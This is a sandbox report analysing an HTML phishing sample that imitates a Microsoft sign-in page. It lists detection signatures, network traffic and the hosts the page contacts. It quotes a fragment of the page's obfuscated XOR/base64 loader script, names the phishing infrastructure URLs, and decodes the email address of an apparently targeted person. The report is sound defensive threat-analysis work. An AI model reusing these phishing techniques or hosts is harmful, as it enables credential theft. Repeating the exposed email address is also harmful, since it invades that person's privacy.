Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U25baPlay_VM-NowATTT0003.html

Overview

General Information

Sample name:#U25baPlay_VM-NowATTT0003.html
renamed because original name is a hash value
Original sample name:Play_VM-NowATTT0003.html
Analysis ID:1635683
MD5:1fbee6e66c293ff085cb6295de3d701c
SHA1:e0f9d651660e3397bbc934cac55046a184b3beff
SHA256:73234ea4cf67ca57ab268f1f0a79239e5eda7a093258d6f7c03574abb91283f0
Infos:

Detection

HTMLPhisher
Score:76
Range:0 - 100
Confidence:100%

Signatures

AI detected phishing page
Yara detected HtmlPhish10
Detected javascript redirector / loader
HTML document with suspicious name
HTML document with suspicious title
HTML file submission containing password form
HTML sample is only containing javascript code
Creates files inside the system directory
Deletes files inside the Windows folder
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
None HTTPS page querying sensitive user data (password, username or email)
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 7004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#U25baPlay_VM-NowATTT0003.html MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6148 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,17621235431573229005,10771836025202767242,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
SourceRuleDescriptionAuthorStrings
0.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
    0.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2025-03-11T22:12:02.091746+010028032742Potentially Bad Traffic192.168.2.1649697104.26.12.205443TCP

      Click to jump to signature section

      Show All Signature Results

      Phishing

      barindex
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlJoe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.2.pages.csv
      Source: Yara matchFile source: 0.1.pages.csv, type: HTML
      Source: Yara matchFile source: 0.2.pages.csv, type: HTML
      Source: #U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Low number of body elements: 0
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlTab title: Sign in to your account
      Source: #U25baPlay_VM-NowATTT0003.htmlHTTP Parser: <script>let rh13z8jemt = 'c3RhY3kud29vZGJ1cnlAc3dnYXMuY29t'; // Aliqua exercitation occaecat turducken dolore.const key = "secret";const xorEncryptDecrypt = (input, key) => { let output = ""; const charCodes = input.split(",").map(N...
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Number of links: 0
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: <input type="password" .../> found but no <form action="...
      Source: #U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Base64 decoded: stacy.woodbury@swgas.com
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Title: Sign in to your account does not match URL
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Invalid link: Privacy statement
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: Has password / email / username input fields
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: <input type="password" .../> found
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No favicon
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No <meta name="author".. found
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No <meta name="copyright".. found
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: No <meta name="copyright".. found
      Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49697 -> 104.26.12.205:443
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownTCP traffic detected without corresponding DNS query: 52.182.143.211
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.204
      Source: unknownTCP traffic detected without corresponding DNS query: 142.250.185.195
      Source: unknownTCP traffic detected without corresponding DNS query: 2.19.122.204
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.orgCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: AutoItHost: api.ipify.org
      Source: global trafficHTTP traffic detected: GET /api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/64.64.116.6 HTTP/1.1User-Agent: AutoItHost: ipqualityscore.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: nullsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: nullsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /attach%2Fbootstrap.min.js HTTP/1.1Host: 6256461081-1317754460.cos.ap-bangkok.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gh/pranaynamnaik/files@latest/micro-123787483.png HTTP/1.1Host: cdn.jsdelivr.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 6256461081-1317754460.cos.ap-bangkok.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: m.arcanepathways.it.com
      Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
      Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745

      System Summary

      barindex
      Source: Name includes: #U25baPlay_VM-NowATTT0003.htmlInitial sample: play
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7004_1700020323
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7004_1700020323
      Source: classification engineClassification label: mal76.phis.winHTML@19/12@28/250
      Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\#U25baPlay_VM-NowATTT0003.html
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,17621235431573229005,10771836025202767242,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,17621235431573229005,10771836025202767242,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2212 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
      Source: Window RecorderWindow detected: More than 3 window changes detected

      Stealing of Sensitive Information

      barindex
      Source: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmlHTTP Parser: file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.html
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
      Process Injection
      1
      Masquerading
      OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
      Process Injection
      LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
      Non-Application Layer Protocol
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
      File Deletion
      Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
      Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
      Ingress Tool Transfer
      Traffic DuplicationData Destruction

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      #U25baPlay_VM-NowATTT0003.html0%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://ipqualityscore.com/api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/64.64.116.60%Avira URL Cloudsafe
      file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.html0%Avira URL Cloudsafe
      https://6256461081-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrap.min.js0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      stackpath.bootstrapcdn.com
      104.18.10.207
      truefalse
        high
        jsdelivr.map.fastly.net
        151.101.1.229
        truefalse
          high
          e329293.dscd.akamaiedge.net
          23.15.178.179
          truefalse
            high
            code.jquery.com
            151.101.66.137
            truefalse
              high
              m.arcanepathways.it.com
              104.21.10.128
              truefalse
                unknown
                cdnjs.cloudflare.com
                104.17.24.14
                truefalse
                  high
                  maxcdn.bootstrapcdn.com
                  104.18.10.207
                  truefalse
                    high
                    cos.ap-bangkok.myqcloud.com
                    43.128.193.190
                    truefalse
                      high
                      www.google.com
                      142.250.186.68
                      truefalse
                        high
                        s-part-0032.t-0009.t-msedge.net
                        13.107.246.60
                        truefalse
                          high
                          aadcdn.msauthimages.net
                          unknown
                          unknownfalse
                            high
                            cdn.jsdelivr.net
                            unknown
                            unknownfalse
                              high
                              6256461081-1317754460.cos.ap-bangkok.myqcloud.com
                              unknown
                              unknownfalse
                                unknown
                                aadcdn.msftauth.net
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://api.ipify.org/false
                                    high
                                    file:///C:/Users/user/Desktop/%23U25baPlay_VM-NowATTT0003.htmltrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                      high
                                      https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                        high
                                        https://ipqualityscore.com/api/json/ip/5SPfwvEV3gwc55pvxBQOnjhEt01fgi0C/64.64.116.6false
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://cdn.jsdelivr.net/gh/pranaynamnaik/files@latest/micro-123787483.pngfalse
                                          high
                                          https://6256461081-1317754460.cos.ap-bangkok.myqcloud.com/attach%2Fbootstrap.min.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.250.186.68
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          95.101.182.65
                                          unknownEuropean Union
                                          20940AKAMAI-ASN1EUfalse
                                          104.18.10.207
                                          stackpath.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.217.18.14
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.21.10.128
                                          m.arcanepathways.it.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          13.107.246.60
                                          s-part-0032.t-0009.t-msedge.netUnited States
                                          8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                          142.250.185.227
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          151.101.66.137
                                          code.jquery.comUnited States
                                          54113FASTLYUSfalse
                                          104.17.24.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          151.101.1.229
                                          jsdelivr.map.fastly.netUnited States
                                          54113FASTLYUSfalse
                                          142.250.110.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          23.15.178.179
                                          e329293.dscd.akamaiedge.netUnited States
                                          20940AKAMAI-ASN1EUfalse
                                          43.128.193.190
                                          cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                          142.250.186.163
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          151.101.65.229
                                          unknownUnited States
                                          54113FASTLYUSfalse
                                          172.217.18.3
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          23.15.178.154
                                          unknownUnited States
                                          20940AKAMAI-ASN1EUfalse
                                          216.58.206.46
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.67.190.41
                                          unknownUnited States
                                          13335CLOUDFLARENETUSfalse
                                          142.250.185.170
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          95.101.182.112
                                          unknownEuropean Union
                                          20940AKAMAI-ASN1EUfalse
                                          IP
                                          192.168.2.16
                                          192.168.2.7
                                          192.168.2.5
                                          Joe Sandbox version:42.0.0 Malachite
                                          Analysis ID:1635683
                                          Start date and time:2025-03-11 22:11:26 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:13
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • EGA enabled
                                          Analysis Mode:stream
                                          Analysis stop reason:Timeout
                                          Sample name:#U25baPlay_VM-NowATTT0003.html
                                          renamed because original name is a hash value
                                          Original Sample Name:Play_VM-NowATTT0003.html
                                          Detection:MAL
                                          Classification:mal76.phis.winHTML@19/12@28/250
                                          Cookbook Comments:
                                          • Found application associated with file extension: .html
                                          • Exclude process from analysis (whitelisted): svchost.exe
                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 216.58.206.46, 172.217.18.3, 172.217.18.14, 142.250.110.84, 142.250.185.170
                                          • Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, slscr.update.microsoft.com, ajax.googleapis.com, sls.update.microsoft.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: 6256461081-1317754460.cos.ap-bangkok.myqcloud.com
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                          Category:downloaded
                                          Size (bytes):621
                                          Entropy (8bit):7.673946009263606
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4761405717E938D7E7400BB15715DB1E
                                          SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                          SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                          SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_4e48046ce74f4b89d45037c90576bfac.svg
                                          Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (65459), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):553013
                                          Entropy (8bit):4.842870890649173
                                          Encrypted:false
                                          SSDEEP:
